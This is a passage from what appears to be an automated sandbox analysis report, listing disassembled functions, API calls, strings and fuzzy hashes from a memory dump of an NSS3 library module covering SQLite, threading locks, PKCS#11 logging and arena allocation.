Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction ID: dab63c2c2cbb5af3b0babc9c70a5736d099bd7ad056b0d6129e5b7028318f722
Opcode Fuzzy Hash: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction Fuzzy Hash: 1B61B2B5E042098BEB20CFA8D984BDEB7B2EF49348F118424DC15E7701E739E855CBA5

Function 6C6F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D97
PR_Lock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DBA
PR_WaitCondVar.NSS3 ref: 6C6F4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DEF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction ID: c4cabf4598df70b83e39adecf617076c54a5c36936acca1d704af290c3936c3f
Opcode Fuzzy Hash: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction Fuzzy Hash: 8B4191B5A08611CFCB20AF78D18816977F5BF05328F054639D8989BB00E730E886CBD5

Function 6C794E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C794E90
EnterCriticalSection.KERNEL32 ref: 6C794EA9
TlsGetValue.KERNEL32 ref: 6C794EC6
EnterCriticalSection.KERNEL32 ref: 6C794EDF
PL_HashTableLookup.NSS3 ref: 6C794EF8
PR_Unlock.NSS3 ref: 6C794F05
PR_Now.NSS3 ref: 6C794F13
PR_Unlock.NSS3 ref: 6C794F3A

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

bUyl, xrefs: 6C794E5C
bUyl, xrefs: 6C794F3F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUyl$bUyl
API String ID: 326028414-4202475308
Opcode ID: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction ID: c1a13988690f978bb4b4278f0058345b720fb03acfa6c8a37690b58a06c55176
Opcode Fuzzy Hash: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction Fuzzy Hash: 1D4148B4A046059FCB10EF78D1848AABBF0FF49358B058679EC599B711EB30E895CBD1

Function 6C760600 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 84stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 6C760623
GetLastError.KERNEL32(?,?,?,?,?,6C7605E2), ref: 6C760642
TlsGetValue.KERNEL32(?,?,?,?,?,6C7605E2), ref: 6C76065D
GetLastError.KERNEL32 ref: 6C760678
PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C76068A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C760693
PR_SetErrorText.NSS3(00000000,?), ref: 6C76069D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,43BA18CD,?,?,?,?,?,6C7605E2), ref: 6C7606CA
PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C7605E2), ref: 6C7606E6

Strings

error %d, xrefs: 6C760682

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Last$AddressProcR_snprintfTextValuestrcmpstrlen
String ID: error %d
API String ID: 4000364758-2147592115
Opcode ID: 326cf02867cafd2111b76a959cbf4bde303c926d0bbe4430bfba27d0b61cdb2a
Instruction ID: d119f6828b65cb869c604cc50e04edafc36e5baa65b2571c8978bee5267ca359
Opcode Fuzzy Hash: 326cf02867cafd2111b76a959cbf4bde303c926d0bbe4430bfba27d0b61cdb2a
Instruction Fuzzy Hash: 3A210871E401809BEB107B3F9E08A5A77B4AF8231DF150578DC0897F52EB319914C7EA

Function 6C7BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C7BDE64), ref: 6C7BED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BED22

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PL_FreeArenaPool.NSS3(?), ref: 6C7BED4A
PL_FinishArenaPool.NSS3(?), ref: 6C7BED6B
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED38

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C7BED52
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED83
PL_FreeArenaPool.NSS3(?), ref: 6C7BED95
PL_FinishArenaPool.NSS3(?), ref: 6C7BED9D

Part of subcall function 6C7D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7D127C,00000000,00000000,00000000), ref: 6C7D650E

Strings

security, xrefs: 6C7BED06

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction ID: 800bef98b8cdac35a7a42216f96c74972949155a071c9da6d0e01fe728124171
Opcode Fuzzy Hash: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction Fuzzy Hash: 371157769002186BE6205A65AF4ABBB7278AF0160CF060DB4E815B2F40FB74B70CD6D6

Function 6C7A2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C7A2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2D07

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2D22

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2D3B

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C7A2D54

Part of subcall function 6C8809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C880BCB
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880BDE
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880C16

Strings

slotID = 0x%x, xrefs: 6C7A2D02
pLabel = 0x%p, xrefs: 6C7A2D4F
ulPinLen = %d, xrefs: 6C7A2D36
pPin = 0x%p, xrefs: 6C7A2D1D
C_InitToken, xrefs: 6C7A2CE7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction ID: 608788fc972c3f0b3014c7d2a9c26859745dc8dcab09ff6540c2c9cd548a5ff8
Opcode Fuzzy Hash: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction Fuzzy Hash: 0A21C475202144AFDB209F95DF4DA557BB1EB8631DF448570E90897A23CB30BC4ACBA1

Function 6C880EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C762357), ref: 6C880EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C762357), ref: 6C880EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Aborting, xrefs: 6C880EB3
Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction ID: 95dbdf9d075b9440fe2e9f0ab8b3f228ff663e2d3dd732bc2caf5fecd2a6dcd8
Opcode Fuzzy Hash: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction Fuzzy Hash: 5AF0A4B99001187BDA203BA19C4AC9B3F2DDF42369F004434FE0956B03DB36EA5596F2

Function 6C7E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E4DCB

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7E4DE1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7E4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E4E59

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C8A300C,00000000), ref: 6C7E4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C7E4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7E4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E521A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction ID: 34dcbb59c3230a960a31f102413f193d8210f8c29fc9f8198eb57eb082ecf93d
Opcode Fuzzy Hash: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction Fuzzy Hash: F4F16E72E00209CFDB04CF94E9407ADB7B2FF49358F258169E915AB781E775E981CB90

Function 6C712E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C712F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C712FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C713005
memcpy.VCRUNTIME140(?,?,?), ref: 6C7130EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C713131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C713178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C713022, 6C713156, 6C713162, 6C71318A, 6C713196, 6C7131A2, 6C7131AE, 6C7131BA, 6C7131C6
database corruption, xrefs: 6C71316C
%s at line %d of [%.10s], xrefs: 6C713171

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction ID: 6fde377befe9a8a92e561df84e8383fcb81db84f4233f9b0377bb6b9b7dd416e
Opcode Fuzzy Hash: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction Fuzzy Hash: 9EB1B4B0E092199FCB18CF9DCA84AEEB7B2BF49314F184429E545B7B41D374A941DBA0

Function 6C6F2400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6F24EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C6F2315), ref: 6C6F254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C6F2315), ref: 6C6F256C

Strings

misuse, xrefs: 6C6F2561
API called with finalized prepared statement, xrefs: 6C6F2543, 6C6F254D
bind on a busy prepared statement: [%s], xrefs: 6C6F24E6
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F24F4, 6C6F2557
API called with NULL prepared statement, xrefs: 6C6F253C
%s at line %d of [%.10s], xrefs: 6C6F2566

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
